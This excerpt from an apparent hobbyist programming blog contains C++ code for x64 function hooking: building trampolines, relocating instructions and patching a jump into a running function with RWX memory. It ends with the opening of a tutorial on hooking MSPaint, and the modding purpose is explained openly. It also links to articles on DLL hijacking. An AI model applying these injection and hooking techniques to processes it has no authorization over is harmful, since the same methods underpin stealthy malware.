<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="o">-></span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">displacement</span> <span class="o">=</span> <span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">];</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_size</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int8_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint8_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int8_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int16_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint16_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int16_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int32_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int32_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">//relative jump instructions need to be rewritten so that they jump to the appropriate</span>
<span class="c1">//place in the Absolute Instruction Table. Since we want to preserve any conditional</span>
<span class="c1">//jump logic, this func rewrites the instruction's operand bytes only. </span>
<span class="kt">void</span> <span class="nf">RewriteStolenJumpInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand</span>
<span class="c1">//rewrite the operand for the jump to go to the jump table</span>
<span class="kt">uint8_t</span> <span class="n">instrByteSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0x0F</span> <span class="o">?</span> <span class="mi">2</span> <span class="o">:</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">operandSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">instrByteSize</span><span class="p">;</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">operandSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">]</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint16_t</span> <span class="n">dist16</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist16</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint32_t</span> <span class="n">dist32</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist32</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">//relative call instructions need to be rewritten as jumps to the appropriate</span>
<span class="c1">//plaec in the Absolute Instruction Table. Since we want to preserve the length</span>
<span class="c1">//of the call instruction, we first replace all the instruction's bytes with 1 byte</span>
<span class="c1">//NOPs, before writing a 2 byte jump to the start</span>
<span class="kt">void</span> <span class="nf">RewriteStolenCallInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">numNOPs</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="mi">2</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">numNOPs</span><span class="p">));</span>
<span class="c1">//calls need to be rewritten as relative jumps to the abs table</span>
<span class="c1">//but we want to preserve the length of the instruction, so pad with NOPs</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="n">distToJumpTable</span> <span class="p">};</span>
<span class="n">memset</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddJmpToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">jmp</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">jmp</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">return</span> <span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">absTableMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">targetAddr</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddCallToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">call</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackToHookedFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">call</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dstMem</span> <span class="o">=</span> <span class="n">absTableMem</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">targetAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="n">dstMem</span> <span class="o">+=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="c1">//after the call, we need to add a second 2 byte jump, which will jump back to the </span>
<span class="c1">//final jump of the stolen bytes</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">jumpBackToHookedFunc</span> <span class="o">-</span> <span class="p">(</span><span class="n">dstMem</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">)))</span> <span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">);</span> <span class="c1">//15</span>
<span class="p">}</span>
<span class="cm">/*build a "jump - sandwich" style trampoline. This style of trampoline has three sections:
|----------------------------|
|Stolen Instructions |
|----------------------------|
|Jummp back to target func |
|----------------------------|
|Absolute Instruction Table |
|----------------------------|
Relative instructions in the stolen instructions section need to be rewritten as absolute
instructions which jump/call to the intended target address of those instructions (since they've
been relocated). Absolute versions of these instructions are added to the absolute instruction
table. The relative instruction in the stolen instructions section get rewritten to relative
jumps to the corresponding instructions in the absolute instruction table.
*/</span>
<span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of a 64 bit mov/jmp instruction pair</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">RewriteStolenJumpInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeCall</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="n">RewriteStolenCallInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">jumpBackMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">((</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">PushAddress</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">addr</span><span class="p">)</span> <span class="c1">//push the address of the jump target</span>
<span class="p">{</span>
<span class="n">hookJumpAddresses</span><span class="p">.</span><span class="n">push</span><span class="p">(</span><span class="n">addr</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//we absolutely don't wnat this inlined</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">noinline</span><span class="p">)</span> <span class="kt">void</span> <span class="nf">PopAddress</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">hookJumpAddresses</span><span class="p">.</span><span class="n">top</span><span class="p">();</span>
<span class="n">hookJumpAddresses</span><span class="p">.</span><span class="n">pop</span><span class="p">();</span>
<span class="n">memcpy</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">trampolinePtr</span><span class="p">,</span> <span class="o">&</span><span class="n">addr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SetOtherThreadsSuspended</span><span class="p">(</span><span class="nb">true</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="c1">//102 is the size of the "pre-payload" instructions that are written below</span>
<span class="c1">//the trampoline will be located after these instructions in memory</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="mi">102</span><span class="p">));</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">memoryIter</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">trampolineAddress</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)(</span><span class="n">memoryIter</span><span class="p">)</span><span class="o">+</span><span class="mi">102</span><span class="p">;</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteSaveArgumentRegisters</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteMovToRCX</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">,</span> <span class="n">trampolineAddress</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteSubRSP32</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">);</span> <span class="c1">//allocate home space for function call</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteAbsoluteCall64</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">,</span> <span class="o">&</span><span class="n">PushAddress</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteAddRSP32</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteRestoreArgumentRegisters</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span>
<span class="c1">//create the relay function</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="n">memoryIter</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="kt">int32_t</span><span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">)));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">SetOtherThreadsSuspended</span><span class="p">(</span><span class="nb">false</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<h2 id="wrap-up">Wrap Up</h2>
<p>This was a fun project to work on, and I feel like all of these hooking/hacking related projects have taught me an awful lot about stuff that I took for granted before. Hopefully it was as much fun to read about as it was to figure out. Who knows, maybe one day you’ll need to add an obnoxious triangle to a third party binary and some of this will come in handy.</p>
<p>I’ve got nothing else interesting to say so I guess that means it’s time to plug my Twitter hadle (<a href="https://twitter.com/khalladay">@khalladay</a>) and share a couple links I found helpful while figuring out to make this project work. Enjoy!</p>
<ul>
<li><a href="https://guidedhacking.com/threads/what-is-dll-hijacking-fast-explanation.13607/">https://guidedhacking.com/threads/what-is-dll-hijacking-fast-explanation.13607/</a></li>
<li><a href="https://itm4n.github.io/windows-dll-hijacking-clarified/">https://itm4n.github.io/windows-dll-hijacking-clarified/</a></li>
<li><a href="https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html">https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html</a></li>
<li><a href="https://docs.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal">https://docs.microsoft.com/en-us/windows/win32/com/component-object-model–com–portal</a></li>
</ul>
<div align="center">
<img src="/images/post_images/2021-07-14/skyrim_triangle2.jpg" />
<br /><br />
</div>
X64 Function Hooking by Example2020-11-13T00:00:00+00:00http://kylehalladay.com/blog/2020/11/13/Hooking-By-Example<style>
.collapsible {
padding: 10px;
background-color: #F0F0F0;
border-style: solid;
border-color: #333333;
border-width: 1px;
}
.collapsewrapper2 {
padding: 0px 0px 18px 0px;
}
</style>
<p>I’ve spent some time recently figuring out how function hooking works. There are tons of great resources available about it, but I’ve noticed that a lot of them are really light on providing example code, and the ones that do provide code tend to link to fully mature hooking frameworks. Usually the linked projects are really impressive, but they aren’t the easiest places to learn the basics from.</p>
<p>Now that I know enough to be dangerous, it seemed like fun to rectify this lack of sample code by building some hooking code from the ground up and walking through how to use that code to hook a running program. My past two blog posts were about making Notepad do weird stuff, so for the sake of variety, this post is going to pick on MSPaint instead.</p>
<p>I’m going to explain how to build 4 example programs. Two of them will show off fundamental hooking concepts by hooking functions in the example code itself. The other two will use those same concepts to hook MSPaint and make it disable the “Edit With Paint3D” button in a running MSPaint instance and force it to always draw with my favourite color (orange).</p>
<div align="center">
<img src="/images/post_images/2020-11-13/orangepaint.gif" />
<br /><br />
</div>
<p>If you’re only interested in sample code, I’ve published a github repo called <a href="https://github.com/khalladay/hooking-by-example">Hooking-by-Example</a> which has 14 increasingly complex example programs that demonstrate how function hooking works (or at least, the bits of it that I’ve figured out). Everything that I talk about here (and more) is also demonstrated by the programs in that repo.</p>
<h2 id="wtf-is-function-hooking">WTF is Function Hooking?</h2>
<p>Function Hooking is a programming technique that lets you to intercept and redirect function calls in a running application, allowing you to change that program’s runtime behaviour in ways that may not have been intended when the program was initially compiled. It’s a little bit like when a dog gets into a car thinking they’re going to the park and ends up at the vet instead. The dog called goToPark(), but instead unexpectedly ended up inside goToVet() instead. This example isn’t great.</p>
<p>The real fun of function hooking is that you can use it to change the behaviour of programs that you don’t have the source code to, or otherwise can’t recompile. Combined with process injection (which I explained a bit <a href="/blog/2020/05/20/Hooking-Input-Snake-In-Notepad.html">in my last post</a>), you can use function hooks to add entirely new behaviour to any program that you can run on your pc. For example, <a href="https://reshade.me/">ReShade</a> uses function hooking to add new postprocessing effects to games, and <a href="https://renderdoc.org/">RenderDoc</a> uses a form of hooking (although not the kind covered here) to allow you to debug graphics code in running applications.</p>
<p>More examples of things you might want to do with function hooking include:</p>
<ul>
<li>Logging or replacing function arguments</li>
<li>Disabling functions</li>
<li>Measuing the execution time of a function</li>
<li>Monitoring or replacing data before it gets sent over a network</li>
</ul>
<p>The only limits are your imagination and ability to read assembly!</p>
<h2 id="how-does-it-work">How Does It Work?</h2>
<p>Let’s say we have a function that adds two Gdiplus::ARGB values together, and we want to use a hook to bypass the addition logic and always return red. The ARGB type is a DWORD that uses a byte for Alpha, Red, Green, and Blue, respectively. Adding two of them together might look like this:</p>
